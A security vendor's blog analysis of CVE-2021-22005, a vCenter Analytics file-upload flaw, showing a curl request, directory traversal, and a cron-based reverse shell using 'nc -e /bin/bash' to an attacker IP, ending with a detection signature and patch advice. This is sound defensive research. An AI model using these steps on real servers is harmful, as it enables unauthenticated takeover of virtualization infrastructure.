About me

Nullam nec elit quis tortor aliquam venenatis a ac enim. Quisque iaculis orci ante, eu tincidunt arcu tempor vitae. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Suspendisse malesuada ante dictum, auctor elit semper, semper dui.

CVE-2021-22005: VMware vCenter Analytics Service Arbitrary File Upload Vulnerability

CVE-2021-22005: VMware vCenter Analytics Service Arbitrary File Upload Vulnerability
October 5, 2021
by

CVE-2021-22005 VMware vCenter Analytics Service Arbitrary File Upload Vulnerability

VMware vCenter server is a centralised management utility used for managing multiple ESXi hosts, virtual machines and all their dependent components.

An arbitrary file upload vulnerability has recently been discovered in the Analytics service of VMware vCenter Server. VMware has confirmed that this vulnerability is being actively exploited in the wild and CVE-2021-2205 has been assigned to it. More details about this vulnerability and various affected versions can be found at NVD.

This blog examines how this vulnerability can be exploited in the unpatched vCenter Server 7.0. 

Vulnerability Details

In our lab, we have locally setup vCenter 7.0 build 17920168 to test the attack scenario.

The Customer Experience Improvement Program (CEIP) enables VMware to collect user usage statistics to improve their product and provide better user support. Some of these statistics are: 

  • Configuration Data 
  • Feature Usage Data
  • Performance Data 
  • Product Log Data

Users can opt in or out of CEIP from vCenter’s vSphere Client: 

VMware CEIP

First, we determined how this telemetry data is collected and stored by VMware server. By taking a look at its various configurations, Juniper Threat Labs found analytics proxy.conf that defines several API calls specific to telemetry, as shown below: 

  • /analytics/telemetry/ph/api/hyper/send 
  • /analytics/telemetry/ph/api/level 
VMware analytics API configuration

We also observed that local and 15080 is configured which should indicate hostname and port used for these APIs. We can see that a service called  vmware-analytics is running over tcp port 15080:

vmware-analytics running over port 15080

The API in use is confirmed when we perform network capture on port 15080. POST request is sent to /analytics/telemetry/ph/api/hyper/send”. The query parameters _c” and _i” defines the filename for the log collected in JSON format wherein the filename is in following format: 

_c<value of parameter _c>_i<value of parameter _i>.json

Result of tcpdump on port 15080

Looking at the logs, we can see that the file is created under folder /var/log/vmware/analytics/prod”, with the body of POST request appended to it:

File created

An arbitrary file upload vulnerability exists in vulnerable versions of VMware vCenter. Any user with web access to vCenter server can make use of the analytics endpoints to create arbitrary files at any directory of their choice. A remote unauthenticated user can create a specially crafted request with malicious code embedded in it that can lead to directory traversal and remote code execution. 

As an example, following curl request can create a file _c_itest.json” with content Example” in location /var/log/vmware/analytics/prod/”:

curl -kv “https://<vCenter-Server-ip>/analytics/telemetry/ph/api/hyper/send?_c&_i=test” -d “Example” -H “Content-Type: application/json”

Steps to recreate attack scenario

  • Create a directory with a test file.
Testing creation of directory and file
File 1234.json created

As we can see filename 1234.json” is created inside folder _c_i”.

  • Create a file in “/tmp” to check for directory traversal
Testing directory traversal

Folder _c_i”  that was created in previous step is important to perform directory traversal, because the process will look for “_c_i/../../../../../../tmp/” folder before writing the file test2.json” at destination location:

File created in /tmp by directory traversal

Remote Code Execution

To achieve remote code execution and obtain a reverse shell, the following steps can be taken:

  1. On the victim’s server, create a cron job at /etc/cron.d/” using directory traversal.
  2. Provide the appropriate payload to attain reverse shell as body of request.  
  3. On attacker machine, use nc to listen on port where we expect to get reverse shell from vCenter server.

Let us first create a cron job file at /etc/cron.d/” to run as file owner and provide reverse shell. 
Here the reverse shell payload used is: 
 
***** root nc –e /bin/bash 192.168.1.2 4444

This payload when written to file reverse.json at /etc/cron.d/” would run the nc –e /bin/bash 192.168.1.2 4444 command every minute.

Creating cron job to obtain reverse shell
cron job created at /etc/cron.d

Once the file is created as expected, we would receive a reverse shell from vCenter server at port 4444 as seen below:

Reverse shell obtained from vCenter server

Remediation and Conclusion

Juniper Networks’ SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against this vulnerability using the signature:

HTTP:CTS:VCNTR-ANALYTCS-AFU

The signature is released as part of export number 3422 and is part of recommended template. 

At the same time, all customers are recommended to update to latest stable version of vCenter as per the advisory released by VMware.

Share
Related posts
The Hidden Door: How CVE-2024-23897 Enabled Ransomware Attack on Indian Banks
The Hidden Door: How CVE-2024-23897 Enabled Ransomware Attack on Indian Banks
August 13, 2024
by
BianLian Ransomware Group: 2024 Activity Analysis
BianLian Ransomware Group: 2024 Activity Analysis
July 11, 2024
by
Protecting Networks from Opportunistic Ivanti Pulse Secure Vulnerability Exploitation
Protecting Networks from Opportunistic Ivanti Pulse Secure Vulnerability Exploitation
May 7, 2024
by